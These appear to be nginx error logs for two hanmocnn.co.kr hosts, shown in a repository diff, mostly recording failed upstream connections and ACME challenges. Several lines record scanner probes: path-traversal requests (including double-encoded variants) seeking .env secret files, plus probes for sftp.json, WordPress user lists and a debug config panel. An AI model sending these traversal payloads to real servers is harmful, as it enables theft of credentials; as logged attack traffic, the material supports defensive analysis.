2026/02/14 23:01:02 [error] 353#353: *314 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /.vscode/sftp.json HTTP/1.1", upstream: "https://222.117.41.51:8000/.vscode/sftp.json", host: "asset.hanmocnn.co.kr"
2026/02/14 23:01:03 [error] 353#353: *317 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "OPTIONS / HTTP/1.1", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
2026/02/14 23:01:04 [error] 353#353: *320 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /?rest_route=/wp/v2/users/ HTTP/1.1", upstream: "https://222.117.41.51:8000/?rest_route=/wp/v2/users/", host: "asset.hanmocnn.co.kr"
2026/02/14 23:01:05 [error] 353#353: *323 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /debug/default/view?panel=config HTTP/1.1", upstream: "https://222.117.41.51:8000/debug/default/view?panel=config", host: "asset.hanmocnn.co.kr"
2026/02/14 23:01:10 [error] 353#353: *327 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
2026/02/14 23:01:10 [error] 353#353: *327 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
2026/02/14 23:02:51 [error] 380#380: *352 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
2026/02/14 23:02:51 [error] 380#380: *352 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
2026/02/14 23:11:33 [error] 382#382: *383 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
2026/02/14 23:11:33 [error] 382#382: *383 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
2026/02/14 23:12:33 [error] 392#392: *407 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
2026/02/14 23:12:33 [error] 392#392: *407 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", upstream: "http://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
2026/02/14 23:16:33 [error] 406#406: *447 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:8000/", host: "asset.hanmocnn.co.kr"
2026/02/14 23:16:33 [error] 406#406: *447 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
2026/02/14 23:16:40 [error] 406#406: *447 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:8000/", host: "asset.hanmocnn.co.kr"
2026/02/14 23:16:40 [error] 406#406: *447 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
2026/02/14 23:18:14 [error] 418#418: *470 asset-pilot could not be resolved (3: Host not found), client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", host: "asset.hanmocnn.co.kr"
2026/02/14 23:18:14 [error] 418#418: *470 asset-pilot could not be resolved (3: Host not found), client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
2026/02/15 00:18:31 [warn] 379#379: *259 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
2026/02/15 00:18:32 [warn] 381#381: *340 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
2026/02/15 00:18:32 [warn] 383#383: *343 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/app/.env HTTP/1.1"
2026/02/15 00:18:33 [warn] 376#376: *347 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/home/www/.env HTTP/1.1"
2026/02/15 00:18:34 [warn] 376#376: *352 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
2026/02/15 00:18:35 [warn] 376#376: *356 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
2026/02/15 00:18:55 [warn] 382#382: *337 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
2026/02/15 00:18:57 [warn] 376#376: *436 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
2026/02/15 00:18:59 [warn] 376#376: *440 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/app/.env HTTP/1.1"
2026/02/15 00:19:01 [warn] 376#376: *444 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/home/www/.env HTTP/1.1"
2026/02/15 00:19:14 [warn] 376#376: *408 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
2026/02/15 00:19:21 [warn] 376#376: *472 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/.env HTTP/1.1"
2026/02/15 00:19:22 [warn] 376#376: *474 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/html/.env HTTP/1.1"
2026/02/15 00:34:33 [warn] 377#377: *564 using uninitialized "server" variable while logging request, client: 81.29.142.6, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", host: "asset.hanmocnn.co.kr"
2026/02/15 01:55:47 [warn] 506#506: *3933 using uninitialized "server" variable while logging request, client: 2.58.56.62, server: asset.hanmocnn.co.kr
2026/02/16 08:37:39 [warn] 861#861: *34202 using uninitialized "server" variable while logging request, client: 91.224.92.99, server: asset.hanmocnn.co.kr
2026/02/16 09:57:24 [warn] 862#862: *34326 using uninitialized "server" variable while logging request, client: 167.172.221.95, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", host: "asset.hanmocnn.co.kr"
2026/02/17 06:06:06 [warn] 906#906: *42459 using uninitialized "server" variable while logging request, client: 45.94.31.224, server: asset.hanmocnn.co.kr
2026/02/17 18:19:14 [warn] 933#933: *79701 using uninitialized "server" variable while logging request, client: 45.94.31.224, server: asset.hanmocnn.co.kr

File diff suppressed because one or more lines are too long

View File

@@ -1,112 +1,4 @@
2026/02/14 23:40:14 [warn] 508#508: *770 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/00/0000000001 while reading upstream, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cache/97de29030b01af5b720989e26703fcf354efbcf2.js HTTP/1.1", upstream: "https://192.168.0.250:8443/cache/97de29030b01af5b720989e26703fcf354efbcf2.js", host: "mail.hanmocnn.co.kr" 2026/02/19 00:41:44 [error] 990#990: *104419 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/601013513494" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/601013513494 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/14 23:40:18 [warn] 510#510: *785 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/00/0000000002 while reading upstream, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cache/97de29030b01af5b720989e26703fcf354efbcf2.js HTTP/1.1", upstream: "https://192.168.0.250:8443/cache/97de29030b01af5b720989e26703fcf354efbcf2.js", host: "mail.hanmocnn.co.kr" 2026/02/19 01:42:14 [error] 991#991: *107643 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/202062540623129" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/202062540623129 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/14 23:40:37 [warn] 508#508: *770 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1" 2026/02/19 02:42:39 [error] 990#990: *107888 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/94071660517770" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/94071660517770 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/14 23:40:38 [warn] 507#507: *871 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1" 2026/02/19 03:43:01 [error] 992#992: *108173 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/3119059711509" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/3119059711509 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/14 23:40:39 [warn] 507#507: *875 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/app/.env HTTP/1.1"
2026/02/14 23:40:43 [warn] 507#507: *892 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/home/www/.env HTTP/1.1"
2026/02/14 23:40:43 [warn] 512#512: *821 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
2026/02/14 23:40:44 [warn] 507#507: *895 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
2026/02/14 23:40:44 [warn] 507#507: *896 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
2026/02/14 23:40:45 [warn] 507#507: *897 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
2026/02/14 23:40:45 [warn] 507#507: *898 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/app/.env HTTP/1.1"
2026/02/14 23:40:45 [warn] 507#507: *900 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/home/www/.env HTTP/1.1"
2026/02/14 23:40:46 [warn] 507#507: *899 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/.env HTTP/1.1"
2026/02/14 23:40:46 [warn] 507#507: *902 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
2026/02/14 23:40:46 [warn] 507#507: *903 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/html/.env HTTP/1.1"
2026/02/14 23:40:54 [warn] 507#507: *924 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/.env HTTP/1.1"
2026/02/14 23:40:55 [warn] 507#507: *928 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/html/.env HTTP/1.1"
2026/02/14 23:47:57 [warn] 506#506: *1044 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/00/0000000003 while reading upstream, client: 52.87.77.128, server: mail.hanmocnn.co.kr, request: "GET /cache/97de29030b01af5b720989e26703fcf354efbcf2.js HTTP/2.0", upstream: "https://192.168.0.250:8443/cache/97de29030b01af5b720989e26703fcf354efbcf2.js", host: "mail.hanmocnn.co.kr", referrer: "https://mail.hanmocnn.co.kr/"
2026/02/14 23:47:57 [warn] 506#506: *1044 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/00/0000000004 while reading upstream, client: 52.87.77.128, server: mail.hanmocnn.co.kr, request: "GET /cache/3c8c8b3a1c6b3ce2aa532d167f918f5d056abec5.css HTTP/2.0", upstream: "https://192.168.0.250:8443/cache/3c8c8b3a1c6b3ce2aa532d167f918f5d056abec5.css", host: "mail.hanmocnn.co.kr", referrer: "https://mail.hanmocnn.co.kr/"
2026/02/14 23:48:20 [warn] 506#506: *1058 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/00/0000000005 while reading upstream, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cache/97de29030b01af5b720989e26703fcf354efbcf2.js HTTP/1.1", upstream: "https://192.168.0.250:8443/cache/97de29030b01af5b720989e26703fcf354efbcf2.js", host: "mail.hanmocnn.co.kr"
2026/02/14 23:48:50 [warn] 506#506: *1058 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
2026/02/14 23:48:51 [warn] 506#506: *1116 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
2026/02/14 23:48:52 [warn] 506#506: *1117 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/app/.env HTTP/1.1"
2026/02/14 23:48:53 [warn] 506#506: *1118 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/home/www/.env HTTP/1.1"
2026/02/14 23:48:54 [warn] 506#506: *1119 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
2026/02/14 23:48:55 [warn] 506#506: *1120 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
2026/02/14 23:48:56 [warn] 506#506: *1121 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/.env HTTP/1.1"
2026/02/14 23:48:57 [warn] 509#509: *1122 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/html/.env HTTP/1.1"
2026/02/15 03:34:47 [warn] 522#522: *5758 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/24/0000002240 while reading upstream, client: 195.178.110.132, server: mail.hanmocnn.co.kr, request: "GET /cache/97de29030b01af5b720989e26703fcf354efbcf2.js HTTP/1.1", upstream: "https://192.168.0.250:8443/cache/97de29030b01af5b720989e26703fcf354efbcf2.js", host: "mail.hanmocnn.co.kr"
2026/02/15 07:04:20 [error] 778#778: *11569 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "POST /rc/?_task=mail&_action=refresh HTTP/2.0", upstream: "https://192.168.0.250:8443/rc/?_task=mail&_action=refresh", host: "mail.hanmocnn.co.kr", referrer: "https://mail.hanmocnn.co.kr/"
2026/02/15 07:05:12 [error] 777#777: *11586 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/132752626722491" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/132752626722491 HTTP/2.0", host: "mail.hanmocnn.co.kr"
2026/02/15 08:05:36 [error] 816#816: *11958 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/22270184778438" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/22270184778438 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/15 09:06:03 [error] 816#816: *12765 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/21520162613543" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/21520162613543 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/15 10:06:26 [error] 817#817: *14716 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/2059769144768" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/2059769144768 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/15 11:06:52 [error] 819#819: *16612 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/10128267644309" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/10128267644309 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/15 12:07:16 [error] 828#828: *16632 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/2271132194420" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/2271132194420 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/15 13:07:41 [error] 827#827: *18753 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/15273027815334" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/15273027815334 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/15 14:08:04 [error] 828#828: *21099 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/48762442931492" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/48762442931492 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/15 15:08:30 [error] 829#829: *22523 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/7003157898126" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/7003157898126 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/15 16:08:53 [error] 832#832: *23289 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/242531237110107" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/242531237110107 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/15 18:09:43 [error] 839#839: *23746 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/716186169298" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/716186169298 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/15 19:10:06 [error] 845#845: *25314 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/845330302829" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/845330302829 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/15 20:10:34 [error] 838#838: *25404 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/275614720369" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/275614720369 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/15 21:10:56 [error] 839#839: *25433 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/298912928363" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/298912928363 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/15 22:11:21 [error] 843#843: *26982 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/293861870717870" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/293861870717870 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 01:12:40 [error] 856#856: *27397 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/2628576016059" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/2628576016059 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 02:13:04 [error] 856#856: *28968 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/169231832519748" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/169231832519748 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 03:13:28 [error] 855#855: *30597 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/126141764620678" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/126141764620678 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 04:13:54 [error] 856#856: *30684 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/72302304222869" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/72302304222869 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 05:14:20 [error] 856#856: *32383 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/18339859020446" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/18339859020446 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 06:14:46 [error] 861#861: *32494 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/261441212623557" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/261441212623557 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 07:15:17 [error] 866#866: *34145 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/5958188332036" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/5958188332036 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 08:15:40 [error] 867#867: *34192 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/318691426327419" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/318691426327419 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 09:16:03 [error] 860#860: *34289 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/222152590129298" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/222152590129298 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 10:16:28 [error] 862#862: *34395 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/168402213416258" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/168402213416258 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 11:16:53 [error] 862#862: *35911 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/1911311937756" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/1911311937756 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 12:17:18 [error] 877#877: *36000 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/25170994713170" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/25170994713170 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 13:17:42 [error] 871#871: *36052 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/2380247415728" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/2380247415728 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 14:18:09 [error] 871#871: *37558 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/21241406018869" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/21241406018869 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 15:18:31 [error] 871#871: *39220 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/4942946414564" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/4942946414564 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 16:18:54 [error] 874#874: *39234 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/211402764230849" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/211402764230849 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 17:19:17 [error] 874#874: *39255 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/3295913714323" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/3295913714323 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 18:19:41 [error] 886#886: *39280 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/171872423417227" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/171872423417227 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 19:20:07 [error] 884#884: *39336 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/206392922531069" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/206392922531069 HTTP/1.1", host: "mail.hanmocnn.co.kr"
